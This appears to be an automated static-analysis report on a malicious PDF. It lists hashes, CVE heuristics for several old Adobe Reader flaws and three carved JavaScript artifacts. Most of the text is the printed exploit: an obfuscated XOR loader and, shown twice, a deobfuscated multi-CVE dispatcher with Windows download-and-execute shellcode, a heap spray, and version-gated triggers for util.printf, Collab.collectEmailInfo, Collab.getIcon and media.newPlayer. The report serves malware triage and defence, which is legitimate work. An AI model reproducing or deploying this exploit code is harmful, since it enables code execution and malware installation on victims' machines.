Malicious PDF / .RU — malware analysis report

Static analysis result for SHA-256 fdfedae9d934e95d…

MALICIOUS

PDF / .RU

10.8 KB Authoring application: Pixegalomcadgiweco First seen: 2026-05-10
MD5: 3b06dbe462d1e7664cd90c575feb06b0 SHA-1: 9c319c747ffdbcfb6d36290f613f92e1cf1e2dab SHA-256: fdfedae9d934e95dd247b31e468d45f052b2a8827a35239aca71f2ca7042e1c5
408 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0018_000.js pdf-javascript-stream PDF /JS object 18 at offset 0x21D8 2639 bytes
SHA-256: 7ead719eca7449da1db3182d00470dd8a45b47611500d3c2af2dff92157d5ed1
Preview script
First 1,000 lines of the extracted script
// 449d0e5a98f69785d8a81521c5bd6623
var eP=String("from2VS4".substr(0,4)+"l6OCharl6O".substr(3,4)+"CodeH5Op".substr(0,4));
// 436e16752b917c1db8659dea10b08c60
var r="char"+"Code"+"At";
// e74f8c03fadbc664854d8da558ed70cf
var t=51-50;
// 5935c0de828782973431ffc44af03f1d
var z=this;
// 392676fc0720d547d0cbdb7196341480
var rK="ch"+"ar"+"Co"+"de"+"AtH8Da".substr(0,2);
// 85052a07a30fc7d78531b9d809e87a78
var gF=String("getPDKr".substr(0,4)+"ageN"+"thWo"+"rd");
// 859f1999cbaa06a1a806260a54646ff0
var p=new String("lengR89".substr(0,4)+"oZPEthEZoP".substr(4,2));
// 347c7f4a5f77d258a4895d7537dbe42c
var b=128;
// 2c9d15aaac984c9d58c61e63e9c696e0
var h=2;
// 79294293378a810cd609f0914cf1167a
var tC=new String("%");
// 25f6c0367c1fae33dc25653dfde99220
var iZ=new String("subst"+"r");
// d9ca0162c3ede0a8b2703763cc29516f
var j=100-100;
// 4dc30a6b782434a0b3b4d6c57c5ef738
var hW=53-51;
// 5826ff7db974b58be445e05de6db611b
var iJ=new String("evaVP7".substr(0,3)+"ld61".substr(0,1));
// 2798b38cc8372b0f4579b302a2d40953
var jQ=new String("getPa"+"geNumlBy".substr(0,5)+"nLEBWordsBEnL".substr(4,5));
// 889e6f8b8a7608610eadd9c9989a7338
var kN="une"+"sca4Zb".substr(0,3)+"pehDR".substr(0,2);
// 51a209cf4d36b83a5d359ba55d4049e1
var v=String;
// 7dc59ca7f2e4d59de517a8861133e993;
// a653b6932438a93db782ca41ba6a3bfb
function x(tQ,oX){return tQ^oX;};
// 9789757e59b95175474dfbce520703f0
var f=z[kN];
// ab5a601e84074745b25c738e885dfd6b
function d(fQ){return z[gF](h,fQ)};
// 85f689451b408840d081dfd3914d83a3
function gX(fU,uH){return fU+uH};
// e7ed7b0bf7b470e2b969280ea32f18d2
var n=new v();
// f76e5c0ddd0b86943ab11cba102a6bea
function xG(gT,rKB){return gT[iZ](rKB,hW)};
// 5b40ef3ab55ec2ed4d0061bef87d8295
var jI=z[jQ](h);
// 5c102b02a746ff978bee5111af6e6c76
var kP=z[iJ];
// 70c2858e3bf7f78375c0173966850b13
function rU(oN,rKB){return oN[r](rKB)};
// f6a1b1c63cd575ac3ccdf1f7a1b31f19
function fI(gT,sJ){return gT[sJ]};
// 7f08ed60db4616f30e73d369a4f1b207
function zO(gT){return gT[p]-hW};
// 6b678e2ed001a14dd95c4729e72622ce
var rK=z[rK];
// e44bd54a064077b7a3175f48bbb38527;
// 6a16d83428a5287d21306f6088f02435
function kD(fU,uH){return fU-uH};
// 682d3b2c0948009fd8559aa416fd5b99
function zM(fQ){
// 9edbed289066b01f4d2de55044944341
var yX=d(fQ);
// d7f2dbb202b96736c6450efa6c4635c3
rKB=zO(yX);
// c7d1cc6efb4aa8c27c3d97fb6764d1f8
nC=xG(yX,rKB);
// 180d5d765202316c0264470d61f9ddd9
sH = f(gX(tC,nC));return rU(sH,j);};for(var fQ=j;fQ<jI;fQ++){
// 09e37a2b39152eab503a5810297053ee
var l=zM(fQ);
// 1bf211ca8187ad948c2c6619db04e96c
var zK=x(l,b);
// b24bf3d87b862c06a8ae537c7599bdc6
n+=fI(v,eP)(zK);
// a9bebf567e76495695a51347c7538771
}kP(n);
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3810 bytes
SHA-256: f52091c3480bfd41adbe405a64e590c18717e2544c901272178ba079ea8e53aa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
NNNN NNN NNm,,,,mmm
	var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
	var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';

var hwTl9Dn = new Array();  

function get_shellcode(name) {

	var u = get_url();
	u = for_unescape(u);

	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}

	return ret;
};


function for_unescape(str)
{
	var out = "";

    str = bin2hex(str);
    g = Math.round(str.length / 4);
	if (g != str.length /4) str+="00";

	for(var i=0; i < str.length; i+=4)
	{
		out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
	}

	return out;	
}


function bin2hex (s){

    var i, f = 0, a = [];
    
    s += '';
    f = s.length;
    
    for (i = 0; i<f; i++) {
        a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
    }
    
    return a.join('');
}



function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

	if (IyIFVe > 8)
	{
		x8EvTm(1);
		var iVvCdy8 = "12999999999999999999";          

		for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
		{
			iVvCdy8 += "8";   
		}

		util.printf("%45000f", iVvCdy8);      
	}


if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	var sf="1.000000000.000000000.1337 : 3.13.37";
	util.printd(sf, new Date());           
	try {	
		media.newPlayer(null);              
	} catch(e) {}
	util.printd(sf, new Date());
}

}

U2UcYKr();

nnnn^m^m^m^^m^mm^NNNmNNmNNNNNNNNNN��^���^�
page_word_xor_stage_000.js deobfuscated-js page-word hex-tail XOR decoded JavaScript (decompressed, key=0x80) at offset 0x40E 3748 bytes
SHA-256: a445cdd271a5876a108c718eff02e2295b7a8d9b0f54d87c279e4b9e9ba40d30
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
	var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';

var hwTl9Dn = new Array();  

function get_shellcode(name) {

	var u = get_url();
	u = for_unescape(u);

	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}

	return ret;
};


function for_unescape(str)
{
	var out = "";

    str = bin2hex(str);
    g = Math.round(str.length / 4);
	if (g != str.length /4) str+="00";

	for(var i=0; i < str.length; i+=4)
	{
		out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
	}

	return out;	
}


function bin2hex (s){

    var i, f = 0, a = [];
    
    s += '';
    f = s.length;
    
    for (i = 0; i<f; i++) {
        a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
    }
    
    return a.join('');
}



function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

	if (IyIFVe > 8)
	{
		x8EvTm(1);
		var iVvCdy8 = "12999999999999999999";          

		for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
		{
			iVvCdy8 += "8";   
		}

		util.printf("%45000f", iVvCdy8);      
	}


if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	var sf="1.000000000.000000000.1337 : 3.13.37";
	util.printd(sf, new Date());           
	try {	
		media.newPlayer(null);              
	} catch(e) {}
	util.printd(sf, new Date());
}

}

U2UcYKr();

Open this report in the interactive analyzer, or submit your own file for analysis.